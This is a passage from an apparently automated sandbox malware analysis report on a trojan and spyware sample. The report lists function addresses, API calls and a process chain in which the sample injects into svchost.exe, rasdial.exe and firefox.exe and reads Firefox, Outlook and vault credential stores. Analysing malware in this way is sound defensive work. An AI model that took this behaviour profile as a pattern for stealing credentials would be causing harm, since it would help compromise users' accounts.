                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_001251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_001251BD
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000CE6A00_2_000CE6A0
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000ED9750_2_000ED975
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000CFCE00_2_000CFCE0
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000E21C50_2_000E21C5
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000F62D20_2_000F62D2
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_001403DA0_2_001403DA
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000F242E0_2_000F242E
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000E25FA0_2_000E25FA
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0011E6160_2_0011E616
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000D66E10_2_000D66E1
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000F878F0_2_000F878F
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000D88080_2_000D8808
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_001408570_2_00140857
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000F68440_2_000F6844
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_001288890_2_00128889
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000ECB210_2_000ECB21
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000F6DB60_2_000F6DB6
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000D6F9E0_2_000D6F9E
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000D30300_2_000D3030
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000E31870_2_000E3187
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000EF1D90_2_000EF1D9
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000C12870_2_000C1287
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000E14840_2_000E1484
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000D55200_2_000D5520
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000E76960_2_000E7696
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000D57600_2_000D5760
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000E19780_2_000E1978
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000F9AB50_2_000F9AB5
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000E1D900_2_000E1D90
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000EBDA60_2_000EBDA6
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_00147DDB0_2_00147DDB
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000CDF000_2_000CDF00
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000D3FE00_2_000D3FE0
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_014D00200_2_014D0020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004187732_2_00418773
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041696F2_2_0041696F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004169732_2_00416973
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101C32_2_004101C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1B32_2_0040E1B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022FD2_2_004022FD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E2FE2_2_0040E2FE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023002_2_00402300
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E3032_2_0040E303
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026602_2_00402660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402E802_2_00402E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EF332_2_0042EF33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF9C2_2_0040FF9C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FFA32_2_0040FFA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA3522_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038003E62_2_038003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F02_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E02742_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C02C02_2_037C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C81582_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038001AA2_2_038001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA1182_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037301002_2_03730100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F81CC2_2_037F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F41A22_2_037F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D20002_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037407702_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037647502_2_03764750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C02_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C6E02_2_0375C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038005912_2_03800591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037405352_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F24462_2_037F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E44202_2_037E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EE4F62_2_037EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB402_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F6BD72_2_037F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA802_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037569622_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380A9A62_2_0380A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A02_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374A8402_2_0374A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037428402_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E8F02_2_0376E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037268B82_2_037268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F402_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760F302_2_03760F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E2F302_2_037E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03782F282_2_03782F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374CFE02_2_0374CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732FC82_2_03732FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BEFA02_2_037BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740E592_2_03740E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEE262_2_037FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEEDB2_2_037FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752E902_2_03752E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FCE932_2_037FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DCD1F2_2_037DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374AD002_2_0374AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373ADE02_2_0373ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03758DBF2_2_03758DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740C002_2_03740C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730CF22_2_03730CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0CB52_2_037E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372D34C2_2_0372D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F132D2_2_037F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0378739A2_2_0378739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E12ED2_2_037E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B2C02_2_0375B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037452A02_2_037452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372F1722_2_0372F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377516C2_2_0377516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374B1B02_2_0374B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380B16B2_2_0380B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F70E92_2_037F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF0E02_2_037FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EF0CC2_2_037EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037470C02_2_037470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF7B02_2_037FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037856302_2_03785630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F16CC2_2_037F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F75712_2_037F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038095C32_2_038095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DD5B02_2_037DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037314602_2_03731460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF43F2_2_037FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFB762_2_037FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B5BF02_2_037B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377DBF92_2_0377DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FB802_2_0375FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B3A6C2_2_037B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFA492_2_037FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7A462_2_037F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EDAC62_2_037EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DDAAC2_2_037DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03785AA02_2_03785AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E1AA32_2_037E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037499502_2_03749950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B9502_2_0375B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D59102_2_037D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AD8002_2_037AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037438E02_2_037438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFF092_2_037FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFFB12_2_037FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03741F922_2_03741F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03749EB02_2_03749EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7D732_2_037F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F1D5A2_2_037F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03743D402_2_03743D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FDC02_2_0375FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B9C322_2_037B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFCF22_2_037FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: String function: 000E8900 appears 42 times
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: String function: 000C7DE1 appears 35 times
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: String function: 000E0AE3 appears 70 times
                Source: fFoOcuxK7M.exe, 00000000.00000003.2161136034.0000000003FBD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs fFoOcuxK7M.exe
                Source: fFoOcuxK7M.exe, 00000000.00000003.2159730557.0000000003DC3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs fFoOcuxK7M.exe
                Source: fFoOcuxK7M.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@7/5
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012A06A GetLastError,FormatMessageW,0_2_0012A06A
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_001181CB AdjustTokenPrivileges,CloseHandle,0_2_001181CB
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_001187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_001187E1
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0012B333
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0013EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0013EE0D
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0012C397
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000C4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_000C4E89
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeFile created: C:\Users\user\AppData\Local\Temp\autD414.tmpJump to behavior
                Source: fFoOcuxK7M.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: rasdial.exe, 00000007.00000002.3384731505.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3384731505.0000000002BF1000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2633129582.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2633282489.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2635351754.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: fFoOcuxK7M.exeVirustotal: Detection: 60%
                Source: fFoOcuxK7M.exeReversingLabs: Detection: 78%
                Source: unknownProcess created: C:\Users\user\Desktop\fFoOcuxK7M.exe "C:\Users\user\Desktop\fFoOcuxK7M.exe"
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\fFoOcuxK7M.exe"
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
                Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\fFoOcuxK7M.exe"Jump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: fFoOcuxK7M.exeStatic file information: File size 1227776 > 1048576
                Source: fFoOcuxK7M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: fFoOcuxK7M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: fFoOcuxK7M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: fFoOcuxK7M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: fFoOcuxK7M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: fFoOcuxK7M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: fFoOcuxK7M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TrOCMVbhcDRPP.exe, 00000006.00000002.3381600573.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2521933157.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: fFoOcuxK7M.exe, 00000000.00000003.2160188894.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, fFoOcuxK7M.exe, 00000000.00000003.2159892716.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363585255.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2455649386.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2455649386.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362029403.0000000003300000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2457562839.0000000004718000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3385957166.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2455394804.0000000004565000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3385957166.00000000048C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: rasdial.pdb source: svchost.exe, 00000002.00000002.2455363254.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2424289874.000000000301A000.00000004.00000020.00020000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000006.00000002.3385029170.00000000014B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: fFoOcuxK7M.exe, 00000000.00000003.2160188894.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, fFoOcuxK7M.exe, 00000000.00000003.2159892716.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2363585255.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2455649386.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2455649386.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362029403.0000000003300000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2457562839.0000000004718000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3385957166.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2455394804.0000000004565000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3385957166.00000000048C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000002.2455363254.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2424289874.000000000301A000.00000004.00000020.00020000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000006.00000002.3385029170.00000000014B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: rasdial.exe, 00000007.00000002.3386629794.0000000004EEC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3384731505.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2522280502.0000000002CCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2741446347.000000003FCBC000.00000004.80000000.00040000.00000000.sdmp
